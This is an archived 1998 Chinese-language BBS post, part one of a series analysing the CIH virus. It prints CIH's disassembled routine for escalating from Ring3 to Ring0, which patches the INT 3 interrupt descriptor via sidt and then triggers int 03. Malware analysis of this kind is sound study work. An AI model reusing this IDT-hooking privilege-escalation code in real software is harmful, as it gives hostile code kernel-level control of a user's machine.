精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 电脑病毒>>☆病毒分析☆>>CIH解析(一)--从Rong3 To Ring0

主题:CIH解析(一)--从Rong3 To Ring0
发信人: crazydiamond()
整理人: jia(1998-10-26 01:23:47), 站内信件
呵呵,眼看CIH成了大热门,俺也来凑凑热闹.有时间的话,我会分几次
把CIH的主要代码Post出来.请高手多多指教.
当然,危险代码比如写bios的就不贴了.
(一)从ring3 to  ring0

:00000000 push ebp
:00000001 lea eax, dword ptr [esp-08]
:00000005 xor ebx, ebx
:00000007 xchg dword ptr fs:[ebx], eax
:0000000A call 0000000F
:0000000F pop ebx
:00000010 lea ecx, dword ptr [ebx+42]
:00000013 push ecx
:00000014 push eax
:00000015 push eax      
:00000016 sidt [esp-02]         ;得到中断描述符表
                                ;8字节
:0000001B pop ebx
:0000001C add ebx, 0000001C     ;中断3的描述符
:0000001F cli
:00000020 mov ebp, dword ptr [ebx]
:00000022 mov bp, word ptr [ebx-04]
:00000026 lea esi, dword ptr [ecx+12]
:00000029 push esi
:0000002A mov word ptr [ebx-04], si
:0000002E shr esi, 10
:00000031 mov word ptr [ebx+02], si     ;修改,使指向程序中
:00000035 pop esi
:00000036 int 03
        ;int03后,系统由Ring3转到Ring0状态,由于int3
        ;代码在病毒内,故实际已取得系统级权利。


--待续--



--
                        ............

※ 来源:.广州网易 BBS bbs.nease.net.[FROM: ppp432.hz.zj.cn]

[关闭][返回]